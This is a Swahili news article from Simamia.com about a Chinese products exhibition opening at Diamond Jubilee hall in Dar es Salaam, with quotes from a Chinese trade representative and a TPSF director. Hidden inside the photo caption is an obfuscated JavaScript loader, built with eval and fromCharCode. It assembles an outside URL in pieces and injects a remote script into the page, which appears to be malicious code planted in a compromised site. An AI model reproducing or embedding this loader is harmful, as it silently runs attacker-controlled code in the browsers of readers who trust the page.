Recent Comments

Maonesho bidhaa za China kuanza Dar es Salaam

By Baraka Bitariho Sep 9, 2015
<p>Mkurugenzi wa Huduma za Uanachama wa Taasisi ya Sekta Binafsi nchini (TPSF), Louis Accaro (kushoto) akisalimiana na mmoja wa wafanyabiashara wa nchini China, Allan Ruhn baada ya kuzungumza na waandishi wa habari, Dar es Salaam jana kuhusu kufanyika kwa Maonesho ya Nne ya Bidhaa za China keshokutwa kwenye ukumbi wa Diamond Jubilee, jijini. Wanaoshuhudia ni wawakilishi wa mashirika na taasisi mbalimbali za wafanyabiashara wa China, Lin Zhiyong na Pan Lei (kulia). Picha na Fadhili Akida).</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Mkurugenzi wa Huduma za Uanachama wa Taasisi ya Sekta Binafsi nchini (TPSF), Louis Accaro (kushoto) akisalimiana na mmoja wa wafanyabiashara wa nchini China, Allan Ruhn baada ya kuzungumza na waandishi wa habari, Dar es Salaam jana kuhusu kufanyika kwa Maonesho ya Nne ya Bidhaa za China keshokutwa kwenye ukumbi wa Diamond Jubilee, jijini. Wanaoshuhudia ni wawakilishi wa mashirika na taasisi mbalimbali za wafanyabiashara wa China, Lin Zhiyong na Pan Lei (kulia). Picha na Fadhili Akida).
Mkurugenzi wa Huduma za Uanachama wa Taasisi ya Sekta Binafsi nchini (TPSF), Louis Accaro (kushoto) akisalimiana na mmoja wa wafanyabiashara wa nchini China, Allan Ruhn baada ya kuzungumza na waandishi wa habari, Dar es Salaam jana kuhusu kufanyika kwa Maonesho ya Nne ya Bidhaa za China keshokutwa kwenye ukumbi wa Diamond Jubilee, jijini. Wanaoshuhudia ni wawakilishi wa mashirika na taasisi mbalimbali za wafanyabiashara wa China, Lin Zhiyong na Pan Lei (kulia). Picha na Fadhili Akida).

MAONESHO ya nne ya bidhaa za China yanatarajiwa kuanza keshokutwa kwenye ukumbi wa Diamond Jubilee jijini Dar es Salaam.

Katika maonesho hayo zaidi ya washiriki 100 wa kichina kutoka katika miji ya Jiangsu, Zhejiang, Fujian, Guangdong na Hunan wataonesha bidhaa zao mbalimbali kwa wananchi kwa lengo la kuzitangaza na kutoa elimu kwa wajasiriamali wa ndani.

Akizungumza na waandishi wa habari, Dar es Salaam jana Mwakilishi wa mambo ya uchumi na biashara wa Jamhuri ya watu wa China hapa nchini, Lin Zhiyong, alisema washiriki wataonesha bidhaa mbalimbali za China zikiwemo mashine za magari, vifaa vya matumizi ya ndani na umeme.

Zhiyong Alizitaja bidhaa nyingine kuwa ni bidhaa za matumizi ya kila siku kwa wateja na bidhaa za shule kulingana na mahitaji ya soko la Afrika, hivyo akawataka wananchi kujitokeza kwa wingi kujifunza na kununua bidhaa hizo.

Kwa upande wake, Mkurugenzi wa huduma za uanachama kutoka Sekta binafsi nchini (TPSF), Louis Accaro, alisema maonesho hayo yatatoa fursa kwa wajasiriamali wa ndani kujifunza mbinu mbalimbali.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com